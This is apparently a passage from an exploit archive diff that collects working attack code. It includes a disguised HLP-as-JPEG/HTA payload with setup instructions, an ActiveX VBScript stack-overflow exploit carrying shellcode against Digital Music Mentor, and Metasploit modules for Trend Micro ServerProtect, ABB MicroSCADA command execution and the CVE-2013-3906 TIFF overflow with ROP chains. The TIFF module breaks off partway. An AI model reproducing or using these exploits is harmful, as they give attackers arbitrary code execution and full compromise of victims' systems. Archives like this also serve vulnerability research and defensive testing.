Y3MucnRmABIAAABzOlxzZXJ2ZXJcbG9jXGNvbnRleHRzZW5zaXRpdmVcYWNsdWlcYWNsX2NzLnJ0
ZgATAAAAczpcc2VydmVyXGxvY1xjb250ZXh0c2Vuc2l0aXZlXGFjbHVpXGFjbF9jcy5ydGYAFAAA
AHM6XHNlcnZlclxsb2NcY29udGV4dHNlbnNpdGl2ZVxhY2x1aVxhY2xfY3MucnRmABUAAABzOlxz
ZXJ2ZXJcbG9jXGNvbnRleHRzZW5zaXRpdmVcYWNsdWlcYWNsX2NzLnJ0ZgAWAAAAczpcc2VydmVy
XGxvY1xjb250ZXh0c2Vuc2l0aXZlXGFjbHVpXGFjbF9jcy5ydGYAFwAAAHM6XHNlcnZlclxsb2Nc
Y29udGV4dHNlbnNpdGl2ZVxhY2x1aVxhY2xfY3MucnRmABgAAABzOlxzZXJ2ZXJcbG9jXGNvbnRl
eHRzZW5zaXRpdmVcYWNsdWlcYWNsX2NzLnJ0ZgAZAAAAczpcc2VydmVyXGxvY1xjb250ZXh0c2Vu
c2l0aXZlXGFjbHVpXGFjbF9jcy5ydGYAGgAAAHM6XHNlcnZlclxsb2NcY29udGV4dHNlbnNpdGl2
ZVxhY2x1aVxhY2xfY3MucnRmABsAAABzOlxzZXJ2ZXJcbG9jXGNvbnRleHRzZW5zaXRpdmVcYWNs
dWlcYWNsX2NzLnJ0ZgAcAAAAczpcc2VydmVyXGxvY1xjb250ZXh0c2Vuc2l0aXZlXGFjbHVpXGFj
bF9jcy5ydGYAHQAAAHM6XHNlcnZlclxsb2NcY29udGV4dHNlbnNpdGl2ZVxhY2x1aVxhY2xfY3Mu
cnRmAB4AAABzOlxzZXJ2ZXJcbG9jXGNvbnRleHRzZW5zaXRpdmVcYWNsdWlcYWNsX2NzLnJ0ZgAf
AAAAczpcc2VydmVyXGxvY1xjb250ZXh0c2Vuc2l0aXZlXGFjbHVpXGFjbF9jcy5ydGYAIAAAAHM6
XHNlcnZlclxsb2NcY29udGV4dHNlbnNpdGl2ZVxhY2x1aVxhY2xfY3MucnRmACEAAABzOlxzZXJ2
ZXJcbG9jXGNvbnRleHRzZW5zaXRpdmVcYWNsdWlcYWNsX2NzLnJ0ZgAiAAAAczpcc2VydmVyXGxv
Y1xjb250ZXh0c2Vuc2l0aXZlXGFjbHVpXGFjbF9jcy5ydGYAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvCAAAJggAAAA7KQIAAAhMegAAAAAAAAAAAAAAAAAAAAAA
AAAA//8BAAEAIgAAAGIFIgD/////AQAAAElESF8xMDAxXzEwMDAAAgAAAElESF8xMDAxXzEwMDEA
AwAAAElESF8xMDAxXzEwMDIABAAAAElESF8xMDAxXzEwMDQABQAAAElESF8xMDAxXzEwMDUABgAA
AElESF8xMDAyXzIwMDEABwAAAElESF8xMDAyXzIwMDIACAAAAElESF8xMDAyXzIwMDQACQAAAElE
SF8xMDAyXzIwMDYACgAAAElESF9yZXNldF9wZXJtaXNzaW9ucwALAAAASURIXzEwMDNfMzAwMQAM
AAAASURIXzEwMDNfMzAwMgANAAAASURIXzEwMDNfMzAwMwAOAAAASURIXzEwMDNfMzAwNAAPAAAA
SURIXzEwMDNfMzAwNgAQAAAASURIX3Jlc2V0X2F1ZGl0aW5nX2VudHJpZXMAEQAAAElESF8xMDA0
XzQwMDAAEgAAAElESF8xMDA0XzQwMDIAEwAAAElESF8xMDA0XzQwMDQAFAAAAElESF8xMDA0XzQw
MDMAFQAAAElESF8xMDA1XzQxMDAAFgAAAGlkaF9jbGVhcl9hbGxfYnV0dG9uX2F1ZGl0ABcAAABJ
REhfMTAwNV80MTAyABgAAABJREhfMTAwNV80MTA0ABkAAABJREhfMTAwNV80MTAzABoAAABpZGhf
Y2xlYXJfYWxsX2J1dHRvbgAbAAAAaWRoX2N1cnJlbnRfb3duZXIAHAAAAElESF8xMDA2XzUwMDIA
HQAAAElESF8xMDA2XzUwMDQAHgAAAElESF9hdWRpdHNfZm9yAB8AAABJREhfcGVybXNfZm9yACAA
AABJREhfRUZGX05BTUUAIQAAAElESF9FRkZfU0VMRUNUACIAAABJREhfRUZGX1BFUk1fTElTVAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAGQAAABAAAAAAQ1MoKTpDVyhgbWFpbicpABkAAAAQAAAAAENTKCk6Q1coYG1haW4n
KQAZAAAAEAAAAABDUygpOkNXKGBtYWluJykAGQAAABAAAAAAQ1MoKTpDVyhgbWFpbicpABkAAAAQ
AAAAAENTKCk6Q1coYG1haW4nKQA8U0NSSVBUPmE9bmV3IEFjdGl2ZVhPYmplY3QoIldzY3JpcHQu
U2hlbGwiKTthLlJ1bigiQ2FsYy5leGUiLDEpOzwvU0NSSVBUPiAgICAgICAgYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWE=
==========eof====================================================================================
Instructions:
place the 2 files on a webserver, edit the "ASP" file to match the
correct local path to the other file and access the asp
file. A download prompt should appear, upon saving the file to disk,
an "HTA" extension is appended, but not shown due to the file name
length. (Tested on a Windows system with screen dimensions (1024x768)
The "PICTURE YOU WILL FIND SO AMAZING.JPEG (Base64 encoded)" file is
simply a Winhelp (.HLP) file with script code appended at the end.
Tip: Do not put "<html>" or "<img>" tags in the file.

9
platforms/windows/remote/29952.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23838/info
Sienzo Digital Music Mentor is prone to multiple stack-based buffer-overflow vulnerabilities because the software fails to adequately check boundaries on data supplied to multiple ActiveX control methods.
An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.
Digital Music Mentor 2.6.0.4 is vulnerable; other versions may also be affected.
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/06</b></p></span> <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------------- Sienzo Digital Music Mentor (DMM) 2.6.0.4 (DSKernel2.dll) multiple method local Stack Overflow Exploit url: http://www.sienzo.com/ price: $59.95 author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 full patched <b>DSKernel2.dll v. 1.0.0.57 is vulnerable to a stack overflow that allows arbitrary code execution.</b> <font color = red><b>This exploits just open calc.exe</b></font> Time Table: 2007/30/04 -> Bug discovered 2007/30/04 -> Vendor notified by mail 2007/02/05 -> Vendor asks for more details 2007/02/05 -> Copy of exploits send to Vendor 2007/03/05 -> No more responses from Vendor 2007/06/05 -> Public disclosure on MoAxB -------------------------------------------------------------------------------------------------------- <object classid='clsid:E2B7DDA9-38C5-11D5-91F6-00104BDB8FF9' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the LockModules test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <input language=VBScript onclick=tryMe2() type=button value="Click here to start the UnlockModule test" style="WIDTH: 350px; HEIGHT: 25px" size=20> <script language = 'vbscript'> Sub tryMe buff = String(263,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.LockModules egg, 1 End Sub Sub tryMe2 buff = String(296,"A") get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll) nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90") shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a") egg = buff + get_EIP + nop + shellcode + nop test.UnlockModule egg, 1, "default" End Sub </script> </span> </code></pre>

93
platforms/windows/remote/29964.rb Executable file
View file

@ -0,0 +1,93 @@
source: http://www.securityfocus.com/bid/23868/info
Trend Micro ServerProtect is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
Exploiting this issue allows attackers to execute arbitrary machine code with SYSTEM-level privileges and to completely compromise affected computers. Failed exploit attempts will result in a denial of service.
##
# $Id: trendmicro_serverprotect_createbinding.rb 5100 2007-09-10 01:01:20Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Antivirus::Trendmicro_Serverprotect_Createbinding < Msf::Exploit::Remote
include Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5100 $',
'References' =>
[
['BID', '23868'],
['CVE', '2007-2508'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x65675aa8 } ], # pop esi; pop ecx; ret - StRpcSrv.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 7 2007'))
register_options( [ Opt::RPORT(5168) ], self.class )
end
def exploit
connect
handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
filler = rand_text_alpha(360) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
filler << [target.ret].pack('V') + payload.encoded
filler << rand_text_english(1400 - payload.encoded.length)
len = filler.length
sploit = NDR.long(0x001f0002) + NDR.long(len) + filler + NDR.long(len)
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
end

116
platforms/windows/remote/30009.rb Executable file
View file

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',
'Description' => %q{
This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
component, which allows arbitrary commands. The component is disabled by default, but
required when a project uses the SCIL function WORKSTATION_CALL.
This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brian Gorenc', # Original discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '100324'],
[ 'ZDI', '13-270' ],
[ 'URL', 'http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Targets' =>
[
[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 05 2013'
))
register_options([Opt::RPORT(12221)], self.class)
end
def check
# Send an EXECUTE packet without command, a valid response
# should include an error code, which is good enough to
# fingerprint.
op = "EXECUTE\x00"
pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
pkt = pkt_length
pkt << op
connect
sock.put(pkt)
res = sock.get_once
disconnect
if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
# More then 750 will trigger overflow...
# Cleaning is done by the exploit on execute_cmdstager_end
execute_cmdstager({:linemax => 750, :nodelete => true})
end
def execute_cmdstager_end(opts)
@var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
@var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
@var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
@var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
end
def execute_command(cmd, opts)
op = "EXECUTE\x00"
command = "cmd.exe /c #{cmd}"
pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length
pkt = pkt_length
pkt << op
pkt << command
connect
sock.put(pkt)
res = sock.get_once
disconnect
unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
end
end
end

912
platforms/windows/remote/30011.rb Executable file
View file

@ -0,0 +1,912 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'nokogiri'
module ::Nokogiri
module XML
class Builder
#
# Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
# So here's our hack to get around that by adding a new custom method to the Builder class
#
def custom_root(ns)
e = @parent.create_element(ns)
e.add_namespace_definition(ns, "href")
@ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
return self
end
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Tagged Image File Format (TIFF) Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
users running Microsoft Office, specifically in the Middle East and South Asia region.
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
and stored in the EAX register. The 32-bit register will run out of storage space to
represent the large vlaue, which ends up being 0, but it still gets pushed as a
dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
chunk anyway with size 0, and the address of this chunk is used as the destination buffer
of a memcpy function, where the source buffer is the EXIF data (an extended image format
supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
by HeapAlloc will end up being overwritten by the memcpy function, and then later used
in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
memory layout using ActiveX, it is possible to gain arbitrary code execution under the
context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3906' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
],
'Payload' =>
{
'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'PrependMigrate' => true
},
'Platform' => 'win',
'Targets' =>
[
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
], self.class)
end
#
# Creates a TIFF that triggers the overflow
#
def make_tiff
# TIFF Header:
# TIFF ID = 'II' (Intel order)
# TIFF Version = 42d
# Offset of FID = 0x000049c8h
#
# Image Directory:
# Number of entries = 17d
# Entry[0] NewSubFileType = 0
# Entry[1] ImageWidth = 256d
# Entry[2] ImageHeight = 338d
# Entry[3] BitsPerSample = 8 8 8
# Entry[4] Compression = JPEG (6)
# Entry[5] Photometric Interpretation = RGP
# Entry[6] StripOffsets = 68 entries (349 bytes)
# Entry[7] SamplesPerPixel = 3
# Entry[8] RowsPerStrip = 5
# Entry[9] StripByteCounts = 68 entries (278 bytes)
# Entry[10] XResolution = 96d
# Entry[11] YResolution = 96d
# Entry[12] Planar Configuration = Clunky
# Entry[13] Resolution Unit = Inch
# Entry[14] Predictor = None
# Entry[15] JPEGInterchangeFormatLength = 5252h (1484h)
# Entry[16] JPEGInterchangeFormat = 13636d
# Notes:
# These values are extracted from the file to calculate the HeapAlloc size that result in the overflow:
# - JPEGInterchangeFormatLength
# - DWORD at offset 3324h (0xffffb898), no documentation for this
# - DWORDS after offset 3328h, no documentation for these, either.
# The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy
# The trigger is really a TIF file, but is named as a JPEG in the docx package
buf = ''
path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg")
::File.open(path, "rb") do |f|
buf = f.read
end
# Gain control of the call [eax+50h] instruction
# XCHG EAX, ESP; RETN msvcrt
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf
end
#
# Generates a payload
#
def get_rop_payload
p = ''
p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
p << payload.encoded
block = p
block << rand_text_alpha(1024 - 80 - p.length)
block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt
block << rand_text_alpha(1024 - block.length)
buf = ''
while (buf.length < 0x80000)
buf << block
end
buf
end
#
# Creates an ActiveX bin that will be used as a spray in Office
#
def make_activex_bin
#
# How an ActiveX bin is referred:
# document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin
# Every bin is a Microsoft Compound Document File:
# http://www.openoffice.org/sc/compdocfileformat.pdf
# The bin file
mscd = ''
mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte)
mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte)
mscd << [0x00000000].pack('V') * 4 # Unique Identifier
mscd << [0x003e].pack('v') # Revision number
mscd << [0x0003].pack('v') # Version number
mscd << [0xfffe].pack('v') # Byte order: Little-Endian
mscd << [0x0009].pack('v') # Sector size
mscd << [0x0006].pack('v') # Size of a short-sector
mscd << "\x00" * 10 # Not used
mscd << [0x00000001].pack('V') # Total number of sectors
mscd << [0x00000001].pack('V') # SecID for the first sector
mscd << [0x00000000].pack('V') # Not used
mscd << [0x00001000].pack('V') # Minimum size of a standard stream
mscd << [0x00000002].pack('V') # Sec ID of first sector
mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table
mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table
mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe
mscd << [0x00000000].pack('V') # SecIDs
mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
mscd[0x200, 4] = [0xfffffffd].pack('V')
mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
mscd << Rex::Text.to_unicode("Root Entry")
mscd << [0x00000000].pack('V') * 11
mscd << [0x0016].pack('v') # Valid range of the previous char array
mscd << "\x05" # Type of entry (Root Storage Entry)
mscd << "\x00" # Node colour of the entry (red)
mscd << [0xffffffff].pack('V') # DirID of the left child node
mscd << [0xffffffff].pack('V') # DirID of the right child node
mscd << [0x00000001].pack('V') # DirID of the root node entry
mscd << [0x1efb6596].pack('V')
mscd << [0x11d1857c].pack('V')
mscd << [0xc0006ab1].pack('V')
mscd << [0x283628f0].pack('V')
mscd << [0x00000000].pack('V') * 3
mscd << [0x287e3070].pack('V')
mscd << [0x01ce2654].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0x00000100].pack('V')
mscd << [0x00000000].pack('V')
mscd << Rex::Text.to_unicode("Contents")
mscd << [0x00000000].pack('V') * 12
mscd << [0x01020012].pack('V')
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 10
mscd << [0x000000e4].pack('V')
mscd << [0x00000000].pack('V') * 18
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 29
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 12
mscd << [0x00000001].pack('V')
mscd << [0x00000002].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 32 #52
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload
mscd
end
#
# Creates an activeX[num].xml file
# @param rid [String] The relationship ID (example: rId1)
# @return [String] XML document
#
def make_activex_xml(rid)
attrs = {
'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
'ax:persistence' => "persistStorage",
'r:id' => "rId#{rid.to_s}",
